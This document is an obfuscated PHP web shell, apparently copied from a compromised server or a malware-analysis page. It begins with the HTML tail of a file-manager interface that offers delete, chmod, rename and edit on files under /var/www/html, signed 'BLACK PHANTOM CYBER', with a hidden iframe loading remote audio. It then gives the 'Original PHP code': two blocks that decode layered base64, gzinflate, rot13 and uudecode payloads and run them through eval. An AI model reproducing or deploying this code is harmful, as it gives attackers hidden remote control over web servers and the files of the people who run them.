<select name="opt">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<input type="submit" value=">">
</form></center></td>
</tr><tr>
<td><a href="?filesrc=/var/www/html/ran.php&path=/var/www/html">ran.php</a></td>
<td><center>13.595 KB</center></td>
<td><center>-rw-rw-r--</center></td>
<td><center><form method="POST" action="?option&path=/var/www/html">
<select name="opt">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="ran.php">
<input type="hidden" name="path" value="/var/www/html/ran.php">
<input type="submit" value=">">
</form></center></td>
</tr></tbody></table>
</div><center><br> </center>
<center><font color="red" face="Courgette" size="4">Copyright © 2019 <font color="#9435dd">BLACK PHANTOM CYBER</font></font></center><font color="red" face="Courgette" size="4">
<iframe width="0" height="0" src="https://k.top4top.net/m_12407hbmd0.mp3" frameborder="0" allowfullscreen=""></iframe>
</font></body></html>Original PHP code
<?php
/*
5H311_1NJ3C706 Obfuscator
fikriwalker4676@gmail.com ;)
*/
$Cyber = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNENyaW1lJTI5JTI5JTI5JTI5JTI5JTI5JTI5JTI5JTNC";
$Crime = "==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";
eval(htmlspecialchars_decode(urldecode(base64_decode($Cyber))));
exit;
?>
<?php
@ini_set(‘output_buffering’,0);
@ini_set(‘display_errors’, 0);
$heker ="DdBZomswAADQf7uoobSGNDVdDVXELMYSRcv+V/HeBs7HIU9sas5DaXnQ34OT+tas3fljMS9vV+XEPW8Re0jWX17qYFgC9CpiV3l+IjZKcVwwZPwNUXtv+K0/KPZs/qsZZ8xlLH6tHLp4aPRiBIoariUN1KtoazJLD9Ktcq2UDHGa8KWWVYdXdL04jcyhekDcJcxF6nSbxs6Ooa3iTVtxJQF22N4/UkWCTXELEEMgioYPrIdduBp8N3L7xllqANyiQu/qCZ5Oe1ArUQnWyepNOIsH45rCwkTTFDBET3z1IpDKvh3PQNSHWTTmd7IfidX8Bgl6DctxqdhmaoqzFLWlocMOvXdYT3bIkJv4rdtwXWDo0M2Ci7zOq5tf/HGgj9E0/MbO5p26GeJk5VFtbsLXhatHPcyrhiEfZw0FUClSp/zX6v1DWZ9URxDoYJYLuExbLTZhYkNhVEk/cwlnd7bgyffYbBkyyeca/tjolRBklD04ca3OfpeCqz/0WyJDbMelOVVxI7jwop6AlGredtL34KWK/8+VDHgFGIvcmLSx9McxxvZflPfZ7AoDNT4P1Xfs+3pmR3UzK50vvtLh9fZwzR3G32WriL4+xYG8gLcMz5bjS81++F4pu555i8w0Gze6He1xMAfzDw==";
@eval(base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode($heker)))))));
exit;
?>